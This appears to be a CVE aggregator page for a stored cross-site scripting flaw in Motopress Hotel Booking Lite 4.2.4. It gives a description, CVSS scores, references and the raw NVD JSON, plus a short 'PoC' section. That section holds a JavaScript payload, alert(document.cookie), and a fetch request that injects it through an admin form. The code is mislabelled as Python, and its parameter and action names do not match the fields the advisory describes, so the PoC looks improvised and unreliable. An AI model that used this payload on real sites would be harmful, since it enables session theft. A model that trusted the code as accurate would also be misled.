CVE-2022-50948

Description

Motopress Hotel Booking Lite 4.2.4 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting payloads in accommodation type fields. Attackers can inject script tags through the title and excerpt parameters when creating accommodation types, which execute in the browser when visitors access the accommodations page.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Motopress Hotel Booking Lite 4.2.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
PoC for CVE-2022-50948 (Stored XSS)
Target: Motopress Hotel Booking Lite < 4.2.5
Description: Inject script into Accommodation Type Title or Excerpt.
-->

<script>
// Simulation of the vulnerable HTTP POST request
// Attacker needs to be logged in with permissions to manage accommodation types

var payload = '<script>alert(document.cookie)<\/script>';

var formData = new FormData();
formData.append('mphb_attribute_title', payload); // Vulnerable parameter: Title
formData.append('mphb_attribute_excerpt', 'Test Accommodation'); // Vulnerable parameter: Excerpt
formData.append('action', 'mphb_add_attribute');
// Nonce and other form fields would be required in a real scenario

fetch('/wp-admin/admin.php?page=mphb_booking_attributes&action=add', {
    method: 'POST',
    body: formData,
    credentials: 'include'
}).then(response => console.log('Payload injected successfully'));
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50948
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50948
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50948/
[4] VulDB https://vuldb.com/cve/CVE-2022-50948
[5] https://motopress.com/
[6] https://www.exploit-db.com/exploits/50951
[7] https://www.vulncheck.com/advisories/motopress-hotel-booking-lite-stored-cross-site-scripting

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50948", "sourceIdentifier": "[email protected]", "published": "2026-05-10T13:16:32.657", "lastModified": "2026-05-12T14:24:15.210", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Motopress Hotel Booking Lite 4.2.4 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting payloads in accommodation type fields. Attackers can inject script tags through the title and excerpt parameters when creating accommodation types, which execute in the browser when visitors access the accommodations page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://motopress.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50951", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/motopress-hotel-booking-lite-stored-cross-site-scripting", "source": "[email protected]"}]}}